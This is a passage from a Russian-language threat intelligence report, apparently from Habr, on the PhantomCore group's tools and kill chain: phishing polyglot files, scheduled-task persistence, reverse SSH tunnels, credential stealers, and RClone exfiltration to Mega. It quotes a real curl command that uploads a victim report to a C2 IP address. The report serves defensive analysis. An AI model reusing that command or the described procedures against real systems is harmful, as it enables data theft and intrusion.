\u043a\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u044e \u0432\u00a0\u0431\u0443\u0434\u0443\u0449\u0438\u0445 \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0430\u0445 2025\u20132026\u00a0\u0433\u043e\u0434\u043e\u0432.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/a7f\/ef7\/1b1\/a7fef71b157996ef8775567f4c852cf5.png\" alt=\"\u0424\u0430\u0439\u043b \u043b\u0438\u0446\u0435\u043d\u0437\u0438\u0438 XenArmor\" title=\"\u0424\u0430\u0439\u043b \u043b\u0438\u0446\u0435\u043d\u0437\u0438\u0438 XenArmor\" width=\"745\" height=\"59\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/a7f\/ef7\/1b1\/a7fef71b157996ef8775567f4c852cf5.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/a7f\/ef7\/1b1\/a7fef71b157996ef8775567f4c852cf5.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0424\u0430\u0439\u043b\u00a0\u043b\u0438\u0446\u0435\u043d\u0437\u0438\u0438 XenArmor<\/figcaption><\/div>\n<\/figure>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/33d\/638\/bea\/33d638beaff5e49b3fd3db6430b007b8.png\" alt=\"\u041f\u043e\u043a\u0443\u043f\u043a\u0430 \u0443\u0442\u0438\u043b\u0438\u0442\u044b 2025 \u0433\u043e\u0434\u0430 \u0441 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore\" title=\"\u041f\u043e\u043a\u0443\u043f\u043a\u0430 \u0443\u0442\u0438\u043b\u0438\u0442\u044b 2025 \u0433\u043e\u0434\u0430 \u0441 \u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore\" width=\"1280\" height=\"551\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/33d\/638\/bea\/33d638beaff5e49b3fd3db6430b007b8.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/33d\/638\/bea\/33d638beaff5e49b3fd3db6430b007b8.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u041f\u043e\u043a\u0443\u043f\u043a\u0430 \u0443\u0442\u0438\u043b\u0438\u0442\u044b 2025\u00a0\u0433\u043e\u0434\u0430 \u0441\u00a0\u0430\u043a\u043a\u0430\u0443\u043d\u0442\u0430 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438 PhantomCore<\/figcaption><\/div>\n<\/figure>\n<\/li>\n<li>\n<p>RClone<\/p>\n<p>RClone\u00a0\u2014 \u043e\u043f\u0435\u043d\u0441\u043e\u0440\u0441\u043d\u0430\u044f \u0443\u0442\u0438\u043b\u0438\u0442\u0430 \u0434\u043b\u044f\u00a0\u0441\u0438\u043d\u0445\u0440\u043e\u043d\u0438\u0437\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u043c\u0435\u0436\u0434\u0443 \u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u043c \u043a\u043e\u043c\u043f\u044c\u044e\u0442\u0435\u0440\u043e\u043c \u0438 \u043e\u0431\u043b\u0430\u0447\u043d\u044b\u043c \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0435\u043c. \u0418\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442\u0441\u044f \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u043e\u0439 PhantomCore \u043d\u0430\u00a0\u0441\u0442\u0430\u0434\u0438\u0438 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 (Exfiltration) \u0434\u0430\u043d\u043d\u044b\u0445 \u0441\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u044b\u0445 \u0445\u043e\u0441\u0442\u043e\u0432.<\/p>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0439 \u043d\u0430\u043c\u0438 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440 RClone, \u0437\u0430\u0433\u0440\u0443\u0436\u0430\u0435\u043c\u044b\u0439 \u0441\u00a0\u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437\u00a0payload\u2011\u0445\u0430\u0431\u043e\u0432 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0438, \u043e\u0442\u043d\u043e\u0441\u0438\u0442\u0441\u044f \u043a\u00a0\u0432\u0435\u0440\u0441\u0438\u0438 1.69.1\u00a0\u0443\u0442\u0438\u043b\u0438\u0442\u044b, \u0447\u0442\u043e\u00a0\u043f\u043e\u0434\u0442\u0432\u0435\u0440\u0436\u0434\u0430\u0435\u0442\u0441\u044f \u0441\u043e\u0432\u043f\u0430\u0434\u0435\u043d\u0438\u0435\u043c \u0445\u0435\u0448\u2011\u0441\u0443\u043c\u043c \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u043e\u0431\u0440\u0430\u0437\u0446\u0430 \u0438 \u043e\u043f\u0443\u0431\u043b\u0438\u043a\u043e\u0432\u0430\u043d\u043d\u043e\u0433\u043e \u0432\u00a0\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u043c \u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u0438.<\/p>\n<p>\u0421\u043e\u0433\u043b\u0430\u0441\u043d\u043e \u0434\u0430\u043d\u043d\u044b\u043c \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u043e\u0433\u043e \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430, \u0434\u043b\u044f\u00a0\u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u0438 \u0434\u0430\u043d\u043d\u044b\u0445 \u0433\u0440\u0443\u043f\u043f\u0438\u0440\u043e\u0432\u043a\u0430 PhantomCore \u0438\u0441\u043f\u043e\u043b\u044c\u0437\u0443\u0435\u0442 \u0430\u043a\u043a\u0430\u0443\u043d\u0442 \u043e\u0431\u043b\u0430\u0447\u043d\u043e\u0433\u043e \u0445\u0440\u0430\u043d\u0438\u043b\u0438\u0449\u0430 Mega[.]nz, \u0437\u0430\u0440\u0435\u0433\u0438\u0441\u0442\u0440\u0438\u0440\u043e\u0432\u0430\u043d\u043d\u044b\u0439 \u043d\u0430\u00a0\u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u044b\u0439 \u0430\u0434\u0440\u0435\u0441 mariaaa228@proton[.]me.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/748\/dac\/7e2\/748dac7e21c70d64e7fef5fd0795c462.png\" alt=\"\u0424\u0430\u0439\u043b \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 RClone\" title=\"\u0424\u0430\u0439\u043b \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 RClone\" width=\"766\" height=\"159\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/748\/dac\/7e2\/748dac7e21c70d64e7fef5fd0795c462.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/748\/dac\/7e2\/748dac7e21c70d64e7fef5fd0795c462.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0424\u0430\u0439\u043b \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0438 RClone<\/figcaption><\/div>\n<\/figure>\n<\/li>\n<\/ol>\n<h3>Kill chain, TTP \u043a\u0438\u0431\u0435\u0440\u0430\u0442\u0430\u043a\u0438<\/h3>\n<ol>\n<li>\n<p>\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u043f\u0435\u0440\u0432\u043e\u043d\u0430\u0447\u0430\u043b\u044c\u043d\u043e\u0433\u043e \u0434\u043e\u0441\u0442\u0443\u043f\u0430 (Initial Access)<\/p>\n<p>\u0414\u043e\u0441\u0442\u0430\u0432\u043a\u0430 \u0431\u044d\u043a\u0434\u043e\u0440\u043e\u0432 \u043e\u0441\u0443\u0449\u0435\u0441\u0442\u0432\u043b\u044f\u0435\u0442\u0441\u044f \u0432\u00a0\u0432\u0438\u0434\u0435 polyglot\u2011\u0444\u0430\u0439\u043b\u043e\u0432 \u0441\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c \u0441\u0440\u0435\u0434\u0438 \u043f\u0440\u043e\u0447\u0435\u0433\u043e \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u044b\u0445 \u0430\u0434\u0440\u0435\u0441\u043e\u0432 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u044b\u0445 \u0440\u043e\u0441\u0441\u0438\u0439\u0441\u043a\u0438\u0445 \u043a\u043e\u043c\u043f\u0430\u043d\u0438\u0439.<\/p>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/c7e\/426\/bdd\/c7e426bdd023358f89cce4378fb96f9e.png\" alt=\"\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e \u0441\u043e \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u043e\u0439 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u0441 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u043c PhantomRShell\" title=\"\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e \u0441\u043e \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u043e\u0439 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u0441 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u043c PhantomRShell\" width=\"1256\" height=\"697\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/c7e\/426\/bdd\/c7e426bdd023358f89cce4378fb96f9e.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/c7e\/426\/bdd\/c7e426bdd023358f89cce4378fb96f9e.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0412\u0440\u0435\u0434\u043e\u043d\u043e\u0441\u043d\u043e\u0435 \u043f\u0438\u0441\u044c\u043c\u043e \u0441\u043e \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u043e\u0439 \u044d\u043b\u0435\u043a\u0442\u0440\u043e\u043d\u043d\u043e\u0439 \u043f\u043e\u0447\u0442\u044b \u0441\u00a0\u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u043c PhantomRShell<\/figcaption><\/div>\n<\/figure>\n<figure class=\"full-width\"><img decoding=\"async\" src=\"https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/5d6\/dae\/12e\/5d6dae12e9497a0fb68438eb88d47368.png\" alt=\"\u0414\u0435\u0442\u0435\u043a\u0442 \u0432 PT Threat Intelligence Portal\" title=\"\u0414\u0435\u0442\u0435\u043a\u0442 \u0432 PT Threat Intelligence Portal\" width=\"1723\" height=\"740\" sizes=\"auto, (max-width: 780px) 100vw, 50vw\" srcset=\"https:\/\/habrastorage.org\/r\/w780\/getpro\/habr\/upload_files\/5d6\/dae\/12e\/5d6dae12e9497a0fb68438eb88d47368.png 780w,&#10;       https:\/\/habrastorage.org\/r\/w1560\/getpro\/habr\/upload_files\/5d6\/dae\/12e\/5d6dae12e9497a0fb68438eb88d47368.png 781w\" loading=\"lazy\" decode=\"async\"\/><\/p>\n<div><figcaption>\u0414\u0435\u0442\u0435\u043a\u0442 \u0432\u00a0PT Threat Intelligence Portal<\/figcaption><\/div>\n<\/figure>\n<\/li>\n<li>\n<p>\u0417\u0430\u043a\u0440\u0435\u043f\u043b\u0435\u043d\u0438\u0435 (Persistence), \u043f\u0440\u0435\u0434\u043e\u0442\u0432\u0440\u0430\u0449\u0435\u043d\u0438\u0435 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u044f (Defence Evasion)<\/p>\n<p>\u041f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u044b:<\/p>\n<ul>\n<li>\n<p>\u0421\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c PhantomRAT \u0438\u043b\u0438\u00a0PhantomRShell \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0430\u0440\u0445\u0438\u0432\u0430 \u0441\u00a0\u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u043e\u043c MeshAgent \u0441\u00a0\u043e\u0434\u043d\u043e\u0433\u043e \u0438\u0437\u00a0payload\u2011\u0445\u0430\u0431\u043e\u0432, \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0430 \u0438 \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0432\u00a0\u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0449\u0438\u043a\u0435 Windows \u0437\u0430\u0434\u0430\u0447\u0438 \u043d\u0430\u00a0\u0435\u0433\u043e \u0435\u0436\u0435\u0434\u043d\u0435\u0432\u043d\u044b\u0439 \u0441\u043a\u0440\u044b\u0442\u044b\u0439 \u0437\u0430\u043f\u0443\u0441\u043a \u0432 10\u00a0\u0447\u0430\u0441\u043e\u0432 \u0443\u0442\u0440\u0430.<\/p>\n<\/li>\n<li>\n<p>\u0421\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c PhantomRAT \u0438\u043b\u0438\u00a0PhantomRShell \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0438 \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u043a\u043b\u0438\u0435\u043d\u0442\u0430 OpenSSH \u0438\u0437\u00a0\u043e\u0444\u0438\u0446\u0438\u0430\u043b\u044c\u043d\u043e\u0433\u043e GitHub\u2011\u0440\u0435\u043f\u043e\u0437\u0438\u0442\u043e\u0440\u0438\u044f, \u043e\u0440\u0433\u0430\u043d\u0438\u0437\u0430\u0446\u0438\u044f \u043e\u0431\u0440\u0430\u0442\u043d\u043e\u0433\u043e (reverse) SSH\u2011\u0442\u0443\u043d\u043d\u0435\u043b\u044f \u043d\u0430\u00a0\u0441\u0435\u0442\u0435\u0432\u043e\u043c \u043f\u043e\u0440\u0442\u0435 80\u00a0(HTTP)\u00a0\u043b\u0438\u0431\u043e 443\u00a0(HTTPS) \u0441\u00a0\u043e\u043f\u0446\u0438\u0435\u0439 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0431\u0435\u0437\u00a0\u043f\u0430\u0440\u043e\u043b\u044f \u0438 \u043a\u043b\u044e\u0447\u0430, \u0441\u043e\u0437\u0434\u0430\u043d\u0438\u0435 \u0432\u00a0\u043f\u043b\u0430\u043d\u0438\u0440\u043e\u0432\u0449\u0438\u043a\u0435 Windows \u0437\u0430\u0434\u0430\u0447\u0438 \u043d\u0430\u00a0\u0435\u0433\u043e \u0435\u0436\u0435\u0434\u043d\u0435\u0432\u043d\u044b\u0439 \u0437\u0430\u043f\u0443\u0441\u043a \u0432 9\u00a0\u0447\u0430\u0441\u043e\u0432 \u0443\u0442\u0440\u0430.<\/p>\n<\/li>\n<li>\n<p>\u0421\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c PhantomRAT \u0438\u043b\u0438\u00a0PhantomRShell \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430 RSocx \u0441\u043e \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u043e\u0433\u043e \u043b\u0435\u0433\u0438\u0442\u0438\u043c\u043d\u043e\u0433\u043e \u0441\u0430\u0439\u0442\u0430, \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0430 \u0438 \u0441\u043a\u0440\u044b\u0442\u044b\u0439 \u0437\u0430\u043f\u0443\u0441\u043a, \u0443\u0441\u0442\u0430\u043d\u043e\u0432\u043a\u0430 \u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u0441\u043e\u0435\u0434\u0438\u043d\u0435\u043d\u0438\u044f \u0441\u00a0\u0441\u0435\u0442\u0435\u0432\u044b\u043c \u043f\u043e\u0440\u0442\u043e\u043c 443\u00a0(HTTPS) \u0438\u043b\u0438 8080\u00a0(HTTP) C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u043f\u043e\u00a0\u043f\u0440\u043e\u0442\u043e\u043a\u043e\u043b\u0443 SOCKS5.<\/p>\n<\/li>\n<li>\n<p>\u0421\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c PhantomRAT \u0438\u043b\u0438\u00a0PhantomRShell \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430 PhantomTaskShell \u0441\u043e \u0432\u0437\u043b\u043e\u043c\u0430\u043d\u043d\u043e\u0433\u043e \u0441\u0430\u0439\u0442\u0430, \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0430 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a \u0432\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p>\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0443\u0447\u0435\u0442\u043d\u044b\u0445 \u0434\u0430\u043d\u043d\u044b\u0445 (Credential Access)<\/p>\n<p>\u041f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u044b:<\/p>\n<ul>\n<li>\n<p>\u0421\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c PhantomTaskShell, \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0449\u0435\u0433\u043e \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043e\u0442\u00a0\u043f\u0430\u043d\u0435\u043b\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom, \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0443\u0442\u0438\u043b\u0438\u0442\u044b \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u0438\u044f \u043f\u0430\u0440\u043e\u043b\u0435\u0439 XenArmor All\u2011In\u2011One Password Recovery Pro \u0441\u00a0payload\u2011\u0445\u0430\u0431\u0430, \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0430 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a \u0432\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0441\u00a0\u043e\u043f\u0446\u0438\u0435\u0439 \u0437\u0430\u043f\u0438\u0441\u0438 \u043e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u043d\u044b\u0445 \u0438 \u0432\u043e\u0441\u0441\u0442\u0430\u043d\u043e\u0432\u043b\u0435\u043d\u043d\u044b\u0445 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438 \u0432\u00a0HTML\u2011\u0444\u0430\u0439\u043b, \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u0435 \u0443\u0442\u0438\u043b\u0438\u0442\u044b \u0438\u0437\u00a0\u0441\u0438\u0441\u0442\u0435\u043c\u044b.<\/p>\n<\/li>\n<li>\n<p>\u0421\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c PhantomTaskShell, \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0449\u0435\u0433\u043e \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043e\u0442\u00a0\u043f\u0430\u043d\u0435\u043b\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom, \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0441\u0442\u0438\u043b\u0435\u0440\u0430 PhantomStealer \u0441\u00a0payload\u2011\u0445\u0430\u0431\u0430, \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0430 \u0438 \u0437\u0430\u043f\u0443\u0441\u043a \u0432\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u0441\u00a0\u043e\u043f\u0446\u0438\u0435\u0439 \u043a\u043e\u043f\u0438\u0440\u043e\u0432\u0430\u043d\u0438\u044f \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432 \u0430\u0443\u0442\u0435\u043d\u0442\u0438\u0444\u0438\u043a\u0430\u0446\u0438\u0438, \u0441\u043e\u0445\u0440\u0430\u043d\u0435\u043d\u043d\u044b\u0445 \u0432\u00a0\u0438\u0437\u0432\u0435\u0441\u0442\u043d\u044b\u0445 \u0432\u0435\u0431\u2011\u0431\u0440\u0430\u0443\u0437\u0435\u0440\u0430\u0445, \u0438 \u0443\u0434\u0430\u043b\u0435\u043d\u0438\u0435 \u0441\u0442\u0438\u043b\u0435\u0440\u0430 \u0438\u0437\u00a0\u0441\u0438\u0441\u0442\u0435\u043c\u044b.<\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p>\u041e\u0431\u043d\u0430\u0440\u0443\u0436\u0435\u043d\u0438\u0435 (Discovery), \u043f\u0435\u0440\u0435\u043c\u0435\u0449\u0435\u043d\u0438\u0435 \u0432\u043d\u0443\u0442\u0440\u0438 \u043f\u0435\u0440\u0438\u043c\u0435\u0442\u0440\u0430 (Lateral Movement)<\/p>\n<p>\u041f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u044b (\u0432\u044b\u043f\u043e\u043b\u043d\u044f\u044e\u0442\u0441\u044f \u0441\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c PhantomTaskShell, \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0449\u0435\u0433\u043e \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043e\u0442\u00a0\u043f\u0430\u043d\u0435\u043b\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom):<\/p>\n<ul>\n<li>\n<p>\u041f\u043e\u043b\u0443\u0447\u0435\u043d\u0438\u0435 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u00a0\u043b\u043e\u043a\u0430\u043b\u044c\u043d\u044b\u0445 \u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u0445, \u043e\u00a0\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u0442\u0435\u043b\u044f\u0445 \u0438 \u0433\u0440\u0443\u043f\u043f\u0430\u0445 Active Directory, \u043e\u0431\u00a0\u043e\u043f\u0435\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0439 \u0438 \u0444\u0430\u0439\u043b\u043e\u0432\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0430\u0445, \u043e\u00a0\u0441\u0438\u0441\u0442\u0435\u043c\u043d\u044b\u0445 \u043f\u0440\u043e\u0446\u0435\u0441\u0441\u0430\u0445 \u0438 \u0441\u043b\u0443\u0436\u0431\u0430\u0445.<\/p>\n<\/li>\n<li>\n<p>\u0418\u0437\u0443\u0447\u0435\u043d\u0438\u0435 \u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u043e\u043a\u0440\u0443\u0436\u0435\u043d\u0438\u044f \u0438 \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u043e\u0432 \u043c\u0430\u0440\u0448\u0440\u0443\u0442\u0438\u0437\u0430\u0446\u0438\u0438.<\/p>\n<\/li>\n<li>\n<p>\u0418\u0437\u0443\u0447\u0435\u043d\u0438\u0435 \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u0439 Windows Defender.<\/p>\n<\/li>\n<li>\n<p>\u041e\u0442\u043f\u0440\u0430\u0432\u043a\u0430 \u0438\u043d\u0444\u043e\u0440\u043c\u0430\u0446\u0438\u0438 \u043e\u00a0\u0437\u0430\u0440\u0430\u0436\u0435\u043d\u043d\u043e\u0439 \u0441\u0438\u0441\u0442\u0435\u043c\u0435 \u043d\u0430\u00a0C2-\u0441\u0435\u0440\u0432\u0435\u0440:<\/p>\n<p><code>C:\\Windows\\System32\\curl.exe -v -F \"file=@C:\\ProgramData\\user_report.txt\" -F \"destinationPath=.\/user_report.txt\" http:\/\/185.130.249.224:80\/upload<\/code><\/p>\n<\/li>\n<\/ul>\n<\/li>\n<li>\n<p>\u0421\u0431\u043e\u0440 (Collection) \u0438 \u044d\u043a\u0441\u0444\u0438\u043b\u044c\u0442\u0440\u0430\u0446\u0438\u044f \u0434\u0430\u043d\u043d\u044b\u0445 (Exfiltration)<\/p>\n<p>\u041f\u0440\u043e\u0446\u0435\u0434\u0443\u0440\u044b:<\/p>\n<ul>\n<li>\n<p>\u0421\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c PhantomTaskShell, \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0449\u0435\u0433\u043e \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043e\u0442\u00a0\u043f\u0430\u043d\u0435\u043b\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom, \u0437\u0430\u043f\u0443\u0441\u043a \u0443\u0442\u0438\u043b\u0438\u0442\u044b certutil.exe \u0432\u00a0\u0441\u043e\u0441\u0442\u0430\u0432\u0435 \u0441\u043b\u0443\u0436\u0431 \u0441\u0435\u0440\u0442\u0438\u0444\u0438\u043a\u0430\u0442\u043e\u0432 Windows c \u043f\u0430\u0440\u0430\u043c\u0435\u0442\u0440\u0430\u043c\u0438 \u2011urlcache \u0438 \u2011f \u0438 \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u044d\u043a\u0437\u0435\u043c\u043f\u043b\u044f\u0440\u0430 RClone \u0438 \u0435\u0433\u043e \u043a\u043e\u043d\u0444\u0438\u0433\u0443\u0440\u0430\u0446\u0438\u043e\u043d\u043d\u043e\u0433\u043e \u0444\u0430\u0439\u043b\u0430 \u0441 8000\u00a0\u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u043f\u043e\u0440\u0442\u0430 C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430.<\/p>\n<\/li>\n<li>\n<p>\u0421\u00a0\u0438\u0441\u043f\u043e\u043b\u044c\u0437\u043e\u0432\u0430\u043d\u0438\u0435\u043c PhantomTaskShell, \u043f\u043e\u043b\u0443\u0447\u0430\u044e\u0449\u0435\u0433\u043e \u043a\u043e\u043c\u0430\u043d\u0434\u044b \u043e\u0442\u00a0\u043f\u0430\u043d\u0435\u043b\u0438 \u0443\u043f\u0440\u0430\u0432\u043b\u0435\u043d\u0438\u044f Phantom, \u0437\u0430\u0433\u0440\u0443\u0437\u043a\u0430 \u0441 80\u00a0\u0441\u0435\u0442\u0435\u0432\u043e\u0433\u043e \u043f\u043e\u0440\u0442\u0430 C2-\u0441\u0435\u0440\u0432\u0435\u0440\u0430 \u0438 \u0440\u0430\u0441\u043f\u0430\u043a\u043e\u0432\u043a\u0430 